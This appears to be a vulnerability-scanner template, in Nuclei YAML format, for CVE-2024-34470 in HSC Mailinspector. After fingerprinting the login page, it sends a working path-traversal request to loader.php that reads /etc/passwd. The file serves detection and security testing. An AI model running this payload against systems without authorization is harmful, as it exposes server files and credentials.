HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion

id: CVE-2024-34470

info:
  name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
  author: topscoder
  severity: high
  description: |
    An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
  reference:
    - https://github.com/osvaldotenorio/CVE-2024-34470
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-34470
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
    epss-score: 0.00043
    epss-percentile: 0.0866
  metadata:
    verified: true
    max-request: 2
    fofa-query: "mailinspector/public"
  tags: cve,cve2024,lfi,mailinspector,hsc

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/login.php"

    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "Licensed to HSC TREINAMENTO"

  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022051184fed9b9a4b1966d32d775675ae1770f24224d547667500500ad3177f5476022100fc9e3a62f08e8debfd9a15e004208573ed4273bfd4d6f2d48e09f8a46bcff1ce:922c64590222798bb761d5b6d8e72950